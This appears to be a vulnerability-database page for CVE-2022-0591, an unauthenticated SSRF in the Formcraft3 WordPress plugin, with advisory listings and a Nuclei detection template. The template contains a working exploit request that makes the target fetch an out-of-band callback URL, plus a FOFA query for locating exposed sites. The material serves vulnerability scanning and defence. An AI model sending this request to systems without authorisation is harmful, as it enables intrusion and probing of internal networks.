| Title | Published | Views | Reporter | Family |
|---|---|---|---|---|
| CVE-2022-0591 | 21 Mar 2022 19:15 | – | attackerkb | |
| CVE-2022-0591 | 21 Mar 2022 21:26 | – | circl | |
| WordPress plugin FormCraft code issue vulnerability | 21 Mar 2022 00:00 | – | cnnvd | |
| CVE-2022-0591 | 21 Mar 2022 18:55 | – | cve | |
| CVE-2022-0591 Formcraft3 < 3.8.28 - Unauthenticated SSRF | 21 Mar 2022 18:55 | – | cvelist | |
| CVE-2022-0591 | 21 Mar 2022 19:15 | – | nvd | |
| CVE-2022-0591 | 21 Mar 2022 19:15 | – | osv | |
| WordPress Formcraft3 premium plugin <= 3.8.27 - Unauthenticated Server-Side Request Forgery (SSRF) vulnerability | 28 Feb 2022 00:00 | – | patchstack | |
| Design/Logic Flaw | 21 Mar 2022 19:15 | – | prion | |
| PT-2022-13286 · WordPress · Formcraft | 21 Mar 2022 00:00 | – | ptsecurity | |
```yaml
id: CVE-2022-0591

info:
  name: Formcraft3 <3.8.28 - Server-Side Request Forgery
  author: Akincibor,j4vaovo
  severity: critical
  description: |
    Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.
  impact: |
    An attacker can send crafted requests to the server, potentially leading to unauthorized access to internal resources or network scanning.
  remediation: |
    Upgrade to Formcraft3 version 3.8.28 or later to fix the SSRF vulnerability.
  reference:
    - https://wpscan.com/vulnerability/b5303e63-d640-4178-9237-d0f524b13d47
    - https://nvd.nist.gov/vuln/detail/CVE-2022-0591
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2022-0591
    cwe-id: CWE-918
    epss-score: 0.20774
    epss-percentile: 0.97222
    cpe: cpe:2.3:a:subtlewebinc:formcraft3:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: subtlewebinc
    product: formcraft3
    framework: wordpress
    fofa-query: "body=\"formcraft3\" && body=\"wp-\""
  tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc,vkev,vuln

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - '{{BaseURL}}'

    matchers:
      - type: word
        internal: true
        words:
          - '/wp-content/plugins/formcraft3/'

  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: WordPress"
# digest: 4a0a0047304502201bcdbb1cc836a6fd96549824ae81e436bdaaf9b41e7790267709d8522d24e549022100bbbd7ed342d85c3addabf8b2435abb4ab5636ca1f62c2decd8b7b8059d05995d:922c64590222798bb761d5b6d8e72950
```